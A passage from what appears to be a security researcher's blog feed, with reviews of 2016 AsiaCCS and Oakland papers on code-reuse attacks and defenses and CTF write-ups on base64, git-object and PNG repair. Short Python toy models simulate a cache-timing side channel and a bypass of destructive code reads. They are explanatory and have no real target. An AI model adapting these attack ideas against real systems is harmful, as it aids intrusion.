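        self.caches = [set() for _ in range(cpus)]

    def invalidate(self, block):
        # Coherency protocol: flush the block from every cache in the system.
        for cache in self.caches:
            cache.discard(block)

    def access(self, cpu, block):
        # A hit in *any* cache is served by a cache-to-cache transfer,
        # which is faster than refetching the block from DRAM.
        if any(block in cache for cache in self.caches):
            latency = CACHE_TRANSFER_LATENCY
        else:
            latency = DRAM_LATENCY
        self.caches[cpu].add(block)
        return latency

system = System()
ATTACKER, VICTIM = 0, 1

# Invalidate + transfer: flush the block, wait, then time the re-access.
system.invalidate("table[7]")
system.access(VICTIM, "table[7]")        # victim touches the block
fast = system.access(ATTACKER, "table[7]")

system.invalidate("table[7]")            # victim stays idle this round
slow = system.access(ATTACKER, "table[7]")

print(fast, slow)  # → 100 300: the lower latency reveals the victim's access
```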
&lt;/div&gt;
&lt;div class="section" id="ropmemu-a-framework-for-the-analysis-of-complex-code-reuse-attacks"&gt;
&lt;h2&gt;ROPMEMU: A Framework for the Analysis of Complex Code-Reuse Attacks&lt;/h2&gt;
&lt;p&gt;Mariano Graziano, Davide Balzarotti, and Alain Zidouemba present a framework to
analyze ROP attacks. ROP attacks are incredibly difficult to understand as the
control flow is immensely complex. ROPMEMU uses heuristics to map ROP gadgets
into equivalent instructions: individual gadgets are decompiled and matched to
simplified instructions through a set of flattening and simplification
heuristics.&lt;/p&gt;
&lt;p&gt;While this works on some examples, the approach has not yet been tested on
larger ROP frameworks and ROP programs. Also, the heuristics will likely break
for arbitrary programs and will need more work. I wonder if such generalized
gadget decompilation is even possible in the general case. The problem they
address is interesting and their framework does well for simple attacks (thereby
adding value). On the other hand, I wonder how generalizable the results are to
arbitrary (hand crafted) ROP programs as they are even more difficult to
analyze, simplify, and decompile than decompiling handwritten assembly programs
into, e.g., C.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="defenses-likely-to-be-broken-soonish"&gt;
&lt;h2&gt;Defenses likely to be broken soonish&lt;/h2&gt;
&lt;p&gt;In addition to the above mentioned attacks and defenses, AsiaCCS also had a fair
share of incremental defenses that are likely to be broken at the next
conference. In &amp;quot;Juggling the Gadgets: Binary-level Code Randomization using
Instruction Displacement&amp;quot;, Hyungjoon Koo and Michalis Polychronakis assume that
fine-grained instruction randomization is in place and they target some
remaining static sequences, trying to complete the randomization and to protect
against, e.g., JIT-ROP attacks. Unfortunately, 2.5% of gadgets remain, which is
likely enough for an attacker to carry out an attack (as we've seen with
coarse-grained CFI protections). Therefore, I'm not too optimistic about this
defense. It extends a complicated defense mechanism even more and still leaves a
large set of remaining gadgets at the attacker's disposal.&lt;/p&gt;
&lt;p&gt;In &amp;quot;No-Execute-After-Read: Preventing Code Disclosure in Commodity Software&amp;quot;,
Jan Werner, George Baltas, Rob Dallara, Nathan Otterness, Kevin Snow, Fabian
Monrose, and Michalis Polychronakis present another mechanism to protect against
JIT-ROP attacks that relies on destructive code reads. As the same set of
authors just showed at Oakland 2 weeks before this conference, such protections
are broken by design as an attacker can (i) find a prefix before the gadget to
find the actual gadget, (ii) reload libraries after gadget discovery, or (iii)
generate multiple equal gadgets through, e.g., JavaScript. This defense is,
as-is, broken before publication (by the same authors).&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="conference"></category><category term="security"></category><category term="AsiaCCS"></category></entry><entry><title>Oakland from a system security perspective</title><link href="/blog/2016/0620-Oakland.html" rel="alternate"></link><published>2016-06-20T08:56:00-04:00</published><updated>2016-06-20T08:56:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2016-06-20:/blog/2016/0620-Oakland.html</id><summary type="html">&lt;p&gt;This year's Oakland (the IEEE Symposium on Security and Privacy, formerly held
in Oakland, California) has been a wild ride. Just a little more than a week
before Oakland I've been in the bay area at the Usenix Security PC meeting at
Google in Mountain View, talking to many folks …&lt;/p&gt;</summary><content type="html">&lt;p&gt;This year's Oakland (the IEEE Symposium on Security and Privacy, formerly held
in Oakland, California) has been a wild ride. Just a little more than a week
before Oakland I've been in the bay area at the Usenix Security PC meeting at
Google in Mountain View, talking to many folks I saw again at Oakland. A little
unfortunately, the deadline for CCS overlapped with the Oakland conference, so
most folks were pretty busy wrapping up their CCS submissions during at least
the first day of Oakland (and up into the night as the CCS deadline was 4am
local time).&lt;/p&gt;
&lt;p&gt;As I am getting scientifically more mature (&amp;quot;older&amp;quot;), the individual paper
presentations become less important (as I've likely already read the ones in my
core area and skimmed the ones that I'm otherwise interested in). Nowadays,
meeting other folks aka the hallway track dominates my conference schedule. One
skill I'm still terrible at is introducing people and finding good seats with
interesting folks during lunches and dinners. I guess, that's just part of my
introvert legacy and a skill that I have to become better at.&lt;/p&gt;
&lt;p&gt;It was interesting to catch up with old friends and also to meet other
colleagues. Several important topics stood out and were discussed multiple
times across many dimensions: (i) review culture in system security, (ii) moving
towards a rolling submission model, and (iii) benchmarking (crimes) in system
security. All these topics carry a lot of tension from different angles and
therefore warrant their own blog posts. Bear with me and stay tuned.&lt;/p&gt;
&lt;p&gt;At the beginning of the conference, Ulfar Erlingsson gave a great peek into the
review culture and fed us some interesting statistics. Oakland had 411 initial
submissions whereas 399 received two initial reviews (the others were dropped
due to format issues). Out of the 399 submissions, 205 made it to round 2, the
others received early rejects. 98 papers then continued to round 3 and 55 were
accepted as part of the PC discussion. What surprised me a little was that there
were only a few Systematization of Knowledge papers in the program. I wonder if
there were just fewer submitted or if the review was more competitive for them.&lt;/p&gt;
&lt;p&gt;Despite the interesting and tempting hallway track (and the CCS deadline), I
tried to attend as many talks related to system security as I could. Overall,
there were several talks that made the conference worthwhile. I've also added a
large set of the talks to the proposed reading list for the  &lt;a class="reference external" href="https://nebelwelt.net/teaching/syssem/16Fsyssem.html"&gt;system security
seminar&lt;/a&gt; in fall
semester. Some of the papers, I'd like to quickly highlight, hopefully
encouraging others to go read the underlying papers and start a more open
discussion.&lt;/p&gt;
&lt;div class="section" id="sok-state-of-the-art-of-war-offensive-techniques-in-binary-analysis"&gt;
&lt;h2&gt;SoK: (State of) The Art of War: Offensive Techniques in Binary Analysis&lt;/h2&gt;
&lt;p&gt;In this &amp;quot;survey&amp;quot; paper, Yan Shoshitaishvili, Ruoyu Wang, Christopher Salls, Nick
Stephens, Mario Polino, Andrew Dutcher, John Grosen, Siji Feng, Christophe
Hauser, Christopher Kruegel, and Giovanni Vigna present their &lt;a class="reference external" href="https://github.com/angr"&gt;angr&lt;/a&gt; framework. Angr is basically a reimplementation of
the state of the art of binary analysis techniques and a combination of static
analysis and symbolic execution techniques. At the core, angr is built to have a
large set of flexible modules that can be combined in different ways, e.g., a
dynamic loader can be used to analyze the structure of a binary that is then
passed to a disassembler where a symbolic execution engine then tries to find a
satisfying assignment of the program representation of a function to trigger a
vulnerability condition. The whole platform is implemented in Python and relies
on VEX to disassemble binary blobs. Building on VEX has the advantage that a
large set of architectures is supported, enabling cross-platform binary
analysis.&lt;/p&gt;
&lt;p&gt;The strength of angr lies in the compositional framework, allowing
a user to build up a sophisticated analysis platform based on a set
of reusable modules. Compared to other binary analysis toolkits that exist, angr
is open-source and can be repurposed and retargeted to other tasks. So far, a
lot of research has focused on single-task binary analysis platforms that are
not compositional and cannot be repurposed to vastly different tasks. Each new
research question forced users to build a new prototype implementation, often
starting from scratch. Angr is a step towards an open platform of binary
analysis engines.&lt;/p&gt;
&lt;p&gt;What I am wondering is, if VEX is the optimal format for binary analysis.
Several formats have been proposed and used in different prototypes (VEX, BAP
IR, QEMU Tiny Code, and many other ad hoc formats). These intermediate
representations are usually rather low level and close to a RISC-like ISA to
reduce complexity (CISC is so incredibly complex and vast that nobody wants to
design an IR that is complex enough to capture all of it).  Especially for
x86/x86-64, there is a lot of translation overhead going down and up again which
makes efficient analysis difficult. I wonder if we should look into better low
level intermediate representations, especially as the x86 architecture will
stick with us for a while.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="a-tough-call-mitigating-advanced-code-reuse-attacks-at-the-binary-level"&gt;
&lt;h2&gt;A Tough call: Mitigating Advanced Code-Reuse Attacks At The Binary Level&lt;/h2&gt;
&lt;p&gt;After their PathArmor paper from last year, Victor van der Veen, Enes Goktas,
Moritz Contag, Andre Pawlowski, Xi Chen, Sanjay Rawat, Herbert Bos, Thorsten
Holz, Elias Athanasopoulos, and Cristiano Giuffrida present an extension of
the Control-Flow Integrity (CFI) policy presented there that increases the
precision of the enforced policy. CFI is hard to get right as precision of the
underlying policy is always a problem, especially for binaries. Source-based
solutions usually compute a type-based approximation of a CFI policy that
ensures tight bounds on each indirect call. For binary-only solutions, such rich
type information is not available.&lt;/p&gt;
&lt;p&gt;TypeArmor recovers as much of the function prototype information as possible,
figuring out the arity of each function (i.e., how many arguments the function
takes). For each call site, the same analysis concludes how many arguments are
passed to the function and then the two pairs are matched. This analysis allows
the distinction of CFI target classes based on the arity of functions, which is
more precise than the lump set of all functions. This policy is comparable to
Google's forward-edge arity CFI policy in IFCC that we looked at for our &lt;a class="reference external" href="https://arxiv.org/abs/1602.04056"&gt;CFI
survey paper&lt;/a&gt;. Different from Google's CFI
policy, Victor et al. propose to trash any unused caller-saved register. The
underlying assumption is that this hinders exploits as it makes it much harder
for the attacker to keep control over register values across function calls.
This aspect basically proposes a new calling convention that trashes any unused
registers across function calls, making exploits less likely as the number of
arguments will have to match the desired registers, adding another degree of
complexity.&lt;/p&gt;
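&lt;p&gt;The arity-matching policy can be sketched as a simple set computation; the
function names and recovered arities below are hypothetical, standing in for
what the binary analysis would reconstruct:&lt;/p&gt;

```python
# Hypothetical arities recovered by a TypeArmor-style binary analysis:
# how many argument registers each function reads.
functions = {"strcpy": 2, "exec_cmd": 1, "memcpy": 3, "exit": 1}

def allowed_targets(callsite_args, funcs):
    """A callsite that demonstrably prepares N arguments may only target
    functions that consume at most N (the analysis over-approximates in
    that direction to stay sound)."""
    return {name for name, arity in funcs.items() if callsite_args >= arity}

print(allowed_targets(2, functions))  # strcpy, exec_cmd, exit
print(allowed_targets(1, functions))  # exec_cmd, exit
```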
&lt;p&gt;It might be interesting to explore such security-sensitive calling conventions
on the compiler level as well. Clearing all unused and caller-saved registers
before calling will increase the complexity of exploit development. I wonder how
much this would increase actual security in practice and how we could quantify
this increase.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="return-of-the-zombie-gadgets-undermining-destructive-code-reads-via-code-inference-attacks"&gt;
&lt;h2&gt;Return of the Zombie Gadgets: Undermining Destructive Code Reads via Code-Inference Attacks&lt;/h2&gt;
&lt;p&gt;In a slightly weird turn of events,  Kevin Z. Snow, Roman Rogowski, Fabian
Monrose, Jan Werner, Hyungjoon Koo and Michalis Polychronakis presented the
attack paper against destructive code reads before presenting their defense
based on destructive code reads at AsiaCCS one week later. At the core, Kevin et
al. claim that destructive code reads will not work as an attacker can always
figure out a set of gadgets and then leverage relative offsets to create actual
gadgets.&lt;/p&gt;
&lt;p&gt;Fine-grained randomization defenses only work if the attacker cannot read the
binary code using an information leak. Otherwise, the attacker would just leak
the binary code and find the gadgets using dynamic ROP gadget finding (JIT-ROP).
Unfortunately, code cannot easily be made execute-only as there is a lot of
interleaving between code and data. The underlying assumption of destructive
code reads is that instructions that read the code will destroy the underlying
gadget as a side effect, i.e., after a code region has been read it cannot be
executed or execution of that code region will trap. In that sense, destructive
code reads are a protection against JIT-ROP to re-enable fine-grained
randomization as an effective defense (seems as if we are layering hot-patches
to mitigate different defenses here).&lt;/p&gt;
&lt;p&gt;Not surprisingly, destructive code reads are not effective as an attacker who is
interested in sequence A of bytes can search for the prefix B if she knows that
BA exists in the program. If B is unique, reading B will allow the attacker to
use gadget A which has not been compromised through the destructive read. The
authors call this disassociation and code inference about gadget locations. In
addition to disassociation, two alternative methods circumvent
destructive reads: singularity (generating the same gadgets all over again,
i.e., through JIT gadget generation) and persistence (reloading a library after
disclosure or across processes).&lt;/p&gt;
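&lt;p&gt;The disassociation bypass is simple to model; the byte values and helper
functions are invented for the sketch:&lt;/p&gt;

```python
code = bytearray(b"\x90\x90UNIQ\x5d\xc3\x90")  # unique prefix, then a gadget
destroyed = set()

def read_code(addr, n):
    """Destructive code read: leaked bytes are destroyed and trap on execute."""
    destroyed.update(range(addr, addr + n))
    return bytes(code[addr:addr + n])

def execute(addr):
    if addr in destroyed:
        raise SystemExit("trap: executing destroyed code")
    return "executed gadget at %d" % addr

# The attacker knows (e.g. from an identical local binary) that the unique
# prefix b"UNIQ" is immediately followed by a useful gadget. Reading the
# prefix destroys only the prefix; the gadget address is inferred, never read.
leak = read_code(2, 4)
assert leak == b"UNIQ"
gadget_addr = 2 + len(leak)
print(execute(gadget_addr))  # → executed gadget at 6
```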
&lt;/div&gt;
&lt;div class="section" id="hdfi-hardware-assisted-data-flow-isolation"&gt;
&lt;h2&gt;HDFI: Hardware-assisted Data-Flow Isolation&lt;/h2&gt;
&lt;p&gt;Data-Flow Integrity (DFI) protects software from corruptions based on data-flow.
Only locations (instructions) that are allowed to write to a certain location
are allowed to execute the actual write (or read). Castro et al. proposed DFI
(OSDI'06) as a compiler-based enforcement mechanism. A static analysis used type
inference to find equivalence classes, only instructions of the correct
equivalence class are allowed to read/write a memory location. A runtime
mechanism tracks equivalence classes for each memory location.&lt;/p&gt;
&lt;p&gt;The HDFI paper by Chengyu Song, Hyungon Moon, Monjur Alam, Insu Yun,
Byoungyoung Lee, Taesoo Kim, Wenke Lee, and Yunheung Paek implements an ISA
extension for Data-Flow Integrity. In the paper, the authors assume that a
compiler-based type analysis assigns types (the pointer analysis is not their
contribution). The tables are then checked using the new hardware instructions,
significantly reducing overhead.&lt;/p&gt;
&lt;p&gt;One of the questions I had was how severe the changes to the underlying
architecture are, given that a lot of additional information needs to be tracked.
As I'm not working close to the hardware I cannot assess the likelihood of such
a mechanism succeeding, but I found the discussion and approach of implementing
such a defense mechanism in hardware interesting. In more general terms, it
would be interesting to see how (small) ISA extensions could significantly
reduce the performance overhead of defense mechanisms. E.g., a generic two-level
lookup for metadata (similar to a page table lookup), as used by binary
translators, metadata managers, and other mechanisms, would significantly
improve many defense mechanisms, yet stay generic enough to allow
different mechanisms to compete.&lt;/p&gt;
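&lt;p&gt;As a toy sketch of this idea (mine, not from the paper), a two-level metadata
lookup can be modeled as follows, with second-level tables allocated lazily just
like page tables; the bit split and table sizes are made up for illustration:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
L1_BITS, L2_BITS = 12, 12  # toy split of a 24-bit address space

class MetaTable:
    # Two-level metadata lookup: the high address bits select a
    # second-level table that is allocated lazily on first write.
    def __init__(self):
        self.l1 = [None] * (2 ** L1_BITS)

    def set(self, addr, meta):
        hi, lo = divmod(addr, 2 ** L2_BITS)
        if self.l1[hi] is None:
            self.l1[hi] = [0] * (2 ** L2_BITS)
        self.l1[hi][lo] = meta

    def get(self, addr):
        hi, lo = divmod(addr, 2 ** L2_BITS)
        page = self.l1[hi]
        return 0 if page is None else page[lo]
&lt;/pre&gt;
&lt;p&gt;In hardware, the index computations and loads could be fused into a single
instruction, which is where the speedup over software-only metadata tracking
would come from.&lt;/p&gt;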
&lt;/div&gt;
&lt;div class="section" id="data-oriented-programming-on-the-expressiveness-of-non-control-data-attacks"&gt;
&lt;h2&gt;Data-Oriented Programming: On the Expressiveness of Non-Control Data Attacks&lt;/h2&gt;
&lt;p&gt;We have known for a while that data-oriented attacks are powerful. Last year we
published Control-Flow Bending and more recently there was Control Jujutsu,
both papers looking at different forms of data-oriented attacks that allow
Turing-complete computation. Control-Flow Bending is a more general approach
that requires (lots of) human analysis while Control Jujutsu would allow for
more automation.&lt;/p&gt;
&lt;p&gt;In this paper, Hong Hu, Shweta Shinde, Adrian Sendroiu, Zheng Leong Chua,
Prateek Saxena, and Zhenkai Liang look at more powerful automation of
data-oriented attacks. The authors build an attack by evaluating the program and
finding a path through the program that does not change control-flow explicitly
but implicitly. Instead of corrupting code pointers, they use memory safety
violations to steer execution to arbitrary computation. This is an interesting
paper that shows how far we can (currently) scale automatic analysis before we
run into state explosions. Future research will look at finding better
heuristics to tune the search, hopefully restricting the search space so that
more powerful adversarial programs can be engineered.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="dedup-est-machina-memory-deduplication-as-an-advanced-exploitation-vector"&gt;
&lt;h2&gt;Dedup Est Machina: Memory Deduplication as an Advanced Exploitation Vector&lt;/h2&gt;
&lt;p&gt;This was a simple, yet beautiful paper by Erik Bosman, Kaveh Razavi, Herbert
Bos, and Cristiano Giuffrida that combines memory deduplication to leak memory
secrets and rowhammer to escalate privileges. In a first step, the authors use
memory deduplication available in Windows 10 to leak ASLR base addresses.
Memory deduplication merges equal pages across processes. Writing to a page
triggers a copy-on-write which the attacker can use as a side channel. See our
earlier paper on &lt;a class="reference external" href="https://nebelwelt.net/publications/files/15WOOT.pdf"&gt;CAIN&lt;/a&gt;
for more details. In a second step, they use rowhammer to toggle &amp;quot;god mode&amp;quot; in
Internet Explorer, allowing the malicious JavaScript to escape the sandbox.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="lava-large-scale-automated-vulnerability-addition"&gt;
&lt;h2&gt;LAVA: Large-scale Automated Vulnerability Addition&lt;/h2&gt;
&lt;p&gt;The LAVA paper by Brendan Dolan-Gavitt, Patrick Hulin, Engin Kirda, Tim Leek, Andrea
Mambretti, Wil Robertson, Frederick Ulrich, and Ryan Whelan discusses a
large-scale framework to evaluate and test defense mechanisms. Evaluating
defense mechanisms based on a large scale corpus is a hard problem. This paper
proposes an automated framework that leverages dynamic taint analysis to
automatically generate test cases with vulnerabilities from benign programs.
These test cases can then be used to test defense mechanisms and let defense
mechanisms compete against each other. Defense mechanisms can be dynamic (i.e.,
protecting against memory corruptions or type confusions at runtime) or static
(i.e., finding vulnerabilities through static analysis at compile time).&lt;/p&gt;
&lt;p&gt;Such a framework is long overdue and it would allow us to let different
mechanisms compete with each other, maybe even ranking different defense
mechanisms in how well they protect against different forms of attack. The
framework first generates a set of test cases based on a bug/error specification
and then evaluates the different selected mechanisms against each other.&lt;/p&gt;
&lt;p&gt;There are plans to open-source the framework and the data-set but due to
corporate policies this will take more time.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="conference"></category><category term="security"></category><category term="Oakland"></category></entry><entry><title>Trend Micro CTF: base64 (crypto 500)</title><link href="/blog/2015/0926-trendmicro-base64.html" rel="alternate"></link><published>2015-09-26T12:00:00-04:00</published><updated>2015-09-26T12:00:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2015-09-26:/blog/2015/0926-trendmicro-base64.html</id><summary type="html">&lt;p&gt;Due to other commitments I only had little time to play during this CTF and when
I arrived on Saturday (the 2nd day of the competition) our b01lers were already
hacking away and we were hovering somewhere around 100.&lt;/p&gt;
&lt;p&gt;For quite a while I looked through some of the others …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Due to other commitments I only had little time to play during this CTF and when
I arrived on Saturday (the 2nd day of the competition) our b01lers were already
hacking away and we were hovering somewhere around 100.&lt;/p&gt;
&lt;p&gt;For quite a while I looked through some of the other and misc challenges but did
not find a good angle. I then turned my attention to base64, a crypto 500
challenge that asked us to identify which letters cannot occur in base64 encoded
strings whenever two strings overlap. The assumption was that two arbitrary
input strings are encoded in base64 and we are supposed to figure out which
letters cannot occur in both strings. The description was quite ambiguous and it
took me some time to figure out that the two strings were just a red herring and
that we only needed to find what characters cannot occur in base64 encoded
strings if the input are &amp;quot;alphabetical&amp;quot; strings.&lt;/p&gt;
&lt;p&gt;Base64 encoding maps three 8-bit bytes to four 6-bit characters (24 bits either
way). This tells us that we have to look at all 3-character combinations to
figure out which characters are possible and which are not. I've hacked a quick
python script to iterate through all 3-character combinations, removing any
resulting character from the initial set of base64 characters:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
import base64

chars = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
sbase64 = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','+','/']
for i in chars:
    for j in chars:
        for k in chars:
            lst = i+j+k
            enc = base64.b64encode(lst)
            for l in enc:
                if l in sbase64:
                    sbase64.remove(l)
print sbase64
&lt;/pre&gt;
&lt;p&gt;When we run the script it takes less than 0.3 seconds to return:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
['7', 'f', '+', '/']
&lt;/pre&gt;
&lt;p&gt;We lex-sort these characters to submit the flag &lt;cite&gt;TMCTF{+/7f}&lt;/cite&gt; and receive 500
points for this 5 minute effort. Go b01lers!&lt;/p&gt;
</content><category term="CTF"></category><category term="CTF"></category><category term="Trend Micro"></category><category term="crypto"></category></entry><entry><title>CSAW: sharpturn</title><link href="/blog/2015/0918-csaw-sharpturn.html" rel="alternate"></link><published>2015-09-19T12:00:00-04:00</published><updated>2015-09-19T12:00:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2015-09-19:/blog/2015/0918-csaw-sharpturn.html</id><summary type="html">&lt;p&gt;For this challenge we were given a corrupted git repository. We started by
checking out the git repository (using &lt;cite&gt;git clone&lt;/cite&gt;) and checking the consistency
of the repository (using &lt;cite&gt;git fsck&lt;/cite&gt;):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Checking object directories: 100% (256/256), done.
error: sha1 mismatch 354ebf392533dce06174f9c8c093036c138935f3
error: 354ebf392533dce06174f9c8c093036c138935f3: object corrupt or missing
error: sha1 …&lt;/pre&gt;</summary><content type="html">&lt;p&gt;For this challenge we were given a corrupted git repository. We started by
checking out the git repository (using &lt;cite&gt;git clone&lt;/cite&gt;) and checking the consistency
of the repository (using &lt;cite&gt;git fsck&lt;/cite&gt;):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Checking object directories: 100% (256/256), done.
error: sha1 mismatch 354ebf392533dce06174f9c8c093036c138935f3
error: 354ebf392533dce06174f9c8c093036c138935f3: object corrupt or missing
error: sha1 mismatch d961f81a588fcfd5e57bbea7e17ddae8a5e61333
error: d961f81a588fcfd5e57bbea7e17ddae8a5e61333: object corrupt or missing
error: sha1 mismatch f8d0839dd728cb9a723e32058dcc386070d5e3b5
error: f8d0839dd728cb9a723e32058dcc386070d5e3b5: object corrupt or missing
missing blob 354ebf392533dce06174f9c8c093036c138935f3
missing blob f8d0839dd728cb9a723e32058dcc386070d5e3b5
missing blob d961f81a588fcfd5e57bbea7e17ddae8a5e61333
&lt;/pre&gt;
&lt;p&gt;The description of the challenge gives a hint and tells us that there is some
corruption on the SATA side. The git object store saves each file as a blob and
names it by the SHA-1 hash of a short header plus the file contents.&lt;/p&gt;
&lt;p&gt;In total there were three 1-byte changes (simple bit flips), one change per
corrupted object. Each commit needs to be fixed, so we wrote a small script that
brute forces all bytes, replacing each byte in turn with all possible alternatives.&lt;/p&gt;
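&lt;p&gt;A minimal sketch of such a brute forcer (my reconstruction, not the exact
script we used): git names a blob by the SHA-1 of a header consisting of the
word blob, the content size, and a NUL byte, followed by the contents, so we can
try every single-byte substitution until the hash matches the object name that
git fsck reported:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
import hashlib

def fix_blob(data, want):
    # git hashes a blob as sha1('blob ' + str(size) + NUL + contents)
    for i in range(len(data)):
        for b in range(256):
            if b == data[i]:
                continue
            cand = data[:i] + bytes([b]) + data[i + 1:]
            hdr = b'blob ' + str(len(cand)).encode() + b'\x00'
            if hashlib.sha1(hdr + cand).hexdigest() == want:
                return cand
    return None
&lt;/pre&gt;
&lt;p&gt;Running this once per corrupted blob, with the hash that git expects, should
recover the original contents in seconds for small files.&lt;/p&gt;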
&lt;p&gt;The first error to fix is 51337 instead of 31337 (3 is flipped to
5, 2 bits change). The second error is in the number that you have to factor for
the challenge: 270031727027 is used instead of 272031727027 (2 is flipped
to 0, 1 bit changes). The last change is &amp;amp;lag instead of flag (f is flipped
to &amp;amp;, 1 bit changes).&lt;/p&gt;
&lt;p&gt;For each corruption we have to checkout (&lt;cite&gt;git checkout&lt;/cite&gt;) the corrupt version and
fix the &lt;cite&gt;sharp.cpp&lt;/cite&gt; file. After fixing all prior errors we run our search
program to find each of the changes mentioned above. The file can then be
rehashed using &lt;cite&gt;git hash-object -w sharp.cpp&lt;/cite&gt; and the object cache will be
updated. We then move on and check out the next corrupt version, until we have
iterated through all the errors.&lt;/p&gt;
&lt;p&gt;When we are done we have to compile the challenge and pass the correct answers
(flag, 31337, money, 31357, 8675311) and we get the flag. Hooray, 400 points for
b01lers!&lt;/p&gt;
</content><category term="CTF"></category><category term="CTF"></category><category term="CSAW"></category><category term="forensics"></category></entry><entry><title>PLAID: pnguncorrupt</title><link href="/blog/2015/0418-plaid-pnguncorrupt.html" rel="alternate"></link><published>2015-04-18T02:00:00-04:00</published><updated>2015-04-18T02:00:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2015-04-18:/blog/2015/0418-plaid-pnguncorrupt.html</id><summary type="html">&lt;p&gt;We received a PNG file that got somehow corrupted in transit. Reading the &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Portable_Network_Graphics"&gt;PNG
specification&lt;/a&gt; and
looking at the first couple of bytes in the header we saw that an &lt;cite&gt;0x0d&lt;/cite&gt; byte
was dropped. The file used &lt;cite&gt;89 50 4e 47 0a 1a 0a&lt;/cite&gt; as header instead of &lt;cite&gt;89 50 …&lt;/cite&gt;&lt;/p&gt;</summary><content type="html">&lt;p&gt;We received a PNG file that got somehow corrupted in transit. Reading the &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Portable_Network_Graphics"&gt;PNG
specification&lt;/a&gt; and
looking at the first couple of bytes in the header we saw that an &lt;cite&gt;0x0d&lt;/cite&gt; byte
was dropped. The file used &lt;cite&gt;89 50 4e 47 0a 1a 0a&lt;/cite&gt; as header instead of &lt;cite&gt;89 50 4e
47 0d 0a 1a 0a&lt;/cite&gt;. According to the PNG specification this is a feature to detect
if the file was converted from cr/lf to lf or from lf to cr/lf. Now if that's not
a huge hint.&lt;/p&gt;
&lt;p&gt;Ignoring the hint we badgered on and continued reading the PNG documentation and
playing around with the PNG after fixing the header. PNG files consist of
multiple chunks of different types. Each chunk consists of a length (4 bytes,
big endian), a chunk type (4 bytes), data (length bytes), and a CRC-32 (4
bytes). Writing a parser we saw that
the first couple of chunks were decoded just fine but then there was a bunch of
IDAT chunks (that contain a deflate-encoded stream of data) that did not match
up. The data was somewhat too short (shorter than the length description) and
the following IDATs did not line up. We tried both padding the data section with
additional 0x0 bytes and shortening the data sections but then the CRC-32 did no
longer match. After we fixed the CRC-32 we got a deflate decode error (in the
first IDAT chunk). Whenever decoding fails in a chunk, PNG readers give up as
they can no longer resynchronize.&lt;/p&gt;
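&lt;p&gt;For reference, the chunk walking part of our parser boils down to something
like this (a sketch, assuming a well-formed file that ends with an IEND chunk):&lt;/p&gt;
&lt;pre class="literal-block"&gt;
import struct
import zlib

def iter_chunks(png):
    # Walk the length / type / data / CRC-32 records that follow
    # the 8-byte PNG signature.
    off = 8
    while True:
        (length,) = struct.unpack('!I', png[off:off + 4])
        ctype = png[off + 4:off + 8]
        data = png[off + 8:off + 8 + length]
        (crc,) = struct.unpack('!I', png[off + 8 + length:off + 12 + length])
        # The CRC-32 covers the chunk type and data, not the length field.
        yield ctype, data, zlib.crc32(ctype + data) == crc
        if ctype == b'IEND':
            break
        off = off + 12 + length
&lt;/pre&gt;
&lt;p&gt;Chunks whose CRC check comes back False are the candidates for repair.&lt;/p&gt;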
&lt;p&gt;Oh well, back to square one. Let's look again at that PNG linefeed conversion
thingy. After looking more closely we discovered that each chunk had 0 to 3
bytes missing. Hm, this looks suspiciously like a Windows to Linux text format
conversion and might tell us that the file was converted in error. An earlier
internet search told us that it is impossible to undo this conversion (that's
why we tried the other options first) but if you try hard it might be possible
to recover.&lt;/p&gt;
&lt;p&gt;So, firing up our Python skills we wrote a quick tool that parses the PNG file,
fixes the header, and copies all correct chunks. For incorrect chunks we extract the
data and recursively try to find correct placements of &lt;cite&gt;0x0d&lt;/cite&gt; bytes. We walk
through the data section and for every &lt;cite&gt;0x0a&lt;/cite&gt; byte we find, we try to place an
&lt;cite&gt;0x0d&lt;/cite&gt; byte before it until the length matches. We then test the CRC-32 and if
the CRC-32 now matches with the CRC-32 in the file we have successfully
recovered the data of this one chunk. This recovery option only works if there
are not too many &lt;cite&gt;0x0d&lt;/cite&gt; bytes that were removed from a specific chunk, otherwise
the search space would explode. Even with only a couple of chunks that had 3
bytes missing the search took roughly 15 minutes on a fast desktop (well, maybe
we should not have coded the search in Python).&lt;/p&gt;
&lt;p&gt;Here's the recursive search function:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
def find0a(buf, nra, crc, loc):
    ptr = string.find(buf, &amp;quot;\x0a&amp;quot;, loc)
    while ptr != -1:
        fbuf = buf[0:ptr]
        fbuf = fbuf + &amp;quot;\x0d&amp;quot;
        fbuf = fbuf + buf[ptr:]
        if nra == 1:
            tcrc = binascii.crc32(fbuf) &amp;amp; 0xffffffff
            if tcrc == crc:
                print &amp;quot;Found a match: &amp;quot;+str(hex(tcrc))
                return fbuf
        else:
            tmp = find0a(fbuf, nra-1, crc, ptr+1)
            if tmp != &amp;quot;&amp;quot;:
                return tmp
        ptr = string.find(buf, &amp;quot;\x0a&amp;quot;, ptr+1)
    return &amp;quot;&amp;quot;
&lt;/pre&gt;
&lt;p&gt;You can guess the remainder of the program (parsing the file format, then
parsing each chunk, looking at the length and searching for the next chunk by
guessing how many bytes are missing). In the end we received a nice Starcraft
